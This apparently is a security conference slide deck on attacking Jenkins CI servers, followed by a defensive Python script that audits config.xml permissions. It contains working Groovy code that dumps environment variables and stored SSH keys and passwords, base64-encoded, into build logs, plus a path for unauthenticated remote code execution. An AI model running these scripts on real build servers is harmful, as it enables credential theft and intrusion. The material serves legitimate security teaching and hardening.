# Attacking Jenkins

Sergej 'winnie' Schmidt, #UnFUCK2019
# Jenkins

* Popular FOSS build scheduler
* More than just cron jobs on steroids
* CI/CD
* Huge plugin ecosystem
Logo by Jenkins project (http://jenkins-ci.org/) - https://wiki.jenkins-ci.org/display/JENKINS/Logo, CC BY-SA 3.0
# A Build System

### And some threat modeling
# Credentials Stored in $JENKINS\_HOME

* secrets/master.key
* secrets/hudson.util.Secret
* credentials.xml
# API Tokens

* Generated for every user
* $JENKINS\_HOME/users/$username/config.xml
* Also encrypted
* Since version v2.129, hashed
# Credentials All Over the Place

* Environment variables
  * Creds often injected as env vars
* Build output
  * printed accidentally
  * set -x
  * Known creds are masked
# Credentials All Over the Place (2)

* EnvInject plugin
  * Discloses env vars
  * Credentials injected into env vars
* Swarm plugin params
  * password
  * passwordEnvVariable
  * passwordFile
# Jenkins Permissions 
# Exploiting Lax Permissions

* Admin script console /script
* Creating jobs
* Editing jobs
* Master label == doom
# Custom Code and Build Parameters

* Config in build jobs
* Jenkinsfile libs or predefined scripts
* Command injections!1!!
# Write-Access to Code

*CODE* := code + tests + make files
# Write-Access to Code (2)

```groovy
// Gradle build script: a build with write access to the repo can read the
// whole build environment and emit it base64-encoded into the console log
defaultTasks 'run'

task run {
    doLast {
        println 'get all me all the env!'
        System.getenv().each { k, v ->
            println "KEY: ${k}, VALUE: ${v}".bytes.encodeBase64().toString()
        }
    }
}
```
# Write-Access to Jenkinsfile

```groovy
// Enumerate stored credentials via the Credentials plugin API and print
// SSH private keys / passwords base64-encoded into the build output
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
    com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class,
    Jenkins.instance,
    null,
    null
);

for (c in creds) {
    println((c.properties.privateKeySource
        ? "ID: " + c.id + ", UserName: " + c.username + ", Private Key: " + c.getPrivateKey()
        : "").bytes.encodeBase64().toString())
}

for (c in creds) {
    println((c.properties.password
        ? "ID: " + c.id + ", UserName: " + c.username + ", Password: " + c.password
        : "").bytes.encodeBase64().toString())
}
```

https://codurance.com/2019/05/30/accessing-and-dumping-jenkins-credentials
# Jenkins \& Patch Management

### Remote RCE with Metaprogramming

$JENKINS\_URL/adjuncts/whatever/class/classLoader/resource/index.jsp/content

```java
jenkins.model.Jenkins.getAdjuncts("whatever")
    .getClass()
    .getClassLoader()
    .getResource("index.jsp")
    .getContent()
```
# Jenkins \& Patch Management (2)

### Remote RCE with Metaprogramming

### Details:

* [Orange Tsai Blog: part 1](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html)
* [Orange Tsai Blog: part 2](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html)
* [HITB Amsterdam talk recording](https://www.youtube.com/watch?v=_x8BsBnQPmU)
* [load 'n launch exploit](https://packetstormsecurity.com/files/151823/Jenkins-Script-Security-1.49-Declarative-1.3.4-Groovy-2.60-Remote-Code-Execution.html)
# SecOps 101

### (for Build Systems)

Stuff you saw + a very incomplete list

* Asset management
* User/permission/creds management
* Network filtering
* Patch Management
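As an added example (not part of the talk), a small audit of the permission problems from the "Exploiting Lax Permissions" slide and the "User/permission/creds management" item above: it reads a Jenkins controller `config.xml` and flags disabled security, broad principals (`anonymous`, `authenticated`) holding admin/script-console or job create/configure rights, and a non-zero executor count on the master. It assumes the matrix-authorization layout and `hudson.model.*` permission id strings that Jenkins writes to `config.xml`; the sample config is constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a Jenkins controller config.xml with lax settings (not a real instance).
SAMPLE_CONFIG = """<?xml version='1.0' encoding='UTF-8'?>
<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:admin</permission>
    <permission>hudson.model.Hudson.Read:anonymous</permission>
    <permission>hudson.model.Item.Configure:authenticated</permission>
    <permission>hudson.model.Item.Create:anonymous</permission>
  </authorizationStrategy>
  <numExecutors>2</numExecutors>
</hudson>
"""

# Permission ids (assumed to match what Jenkins matrix-auth writes) that give control of
# builds or the controller: script console, creating jobs, editing jobs.
DANGEROUS_PERMISSIONS = {
    "hudson.model.Hudson.Administer": "full admin incl. /script console",
    "hudson.model.Hudson.RunScripts": "script console",
    "hudson.model.Item.Configure": "edit existing jobs",
    "hudson.model.Item.Create": "create jobs",
}
BROAD_PRINCIPALS = {"anonymous", "authenticated"}


def audit_config(xml_text):
    """Return a list of human-readable findings for a Jenkins controller config.xml."""
    root = ET.fromstring(xml_text)
    findings = []
    use_security = (root.findtext("useSecurity") or "").strip().lower()
    strategy = root.find("authorizationStrategy")
    strategy_class = strategy.get("class", "") if strategy is not None else ""
    if use_security != "true" or strategy_class.endswith("$Unsecured"):
        findings.append("security disabled: everyone is effectively admin")
    if strategy is not None:
        for perm in strategy.findall("permission"):
            perm_id, _, principal = (perm.text or "").strip().partition(":")
            if principal in BROAD_PRINCIPALS and perm_id in DANGEROUS_PERMISSIONS:
                findings.append(f"{principal} has {perm_id} ({DANGEROUS_PERMISSIONS[perm_id]})")
    # Executors on the master let jobs run with the controller's file-system access
    # ($JENKINS_HOME secrets, credentials.xml): the "Master label == doom" slide.
    executors = int((root.findtext("numExecutors") or "0").strip())
    if executors > 0:
        findings.append(f"controller has {executors} executors: jobs can run on master")
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print("FINDING:", finding)
```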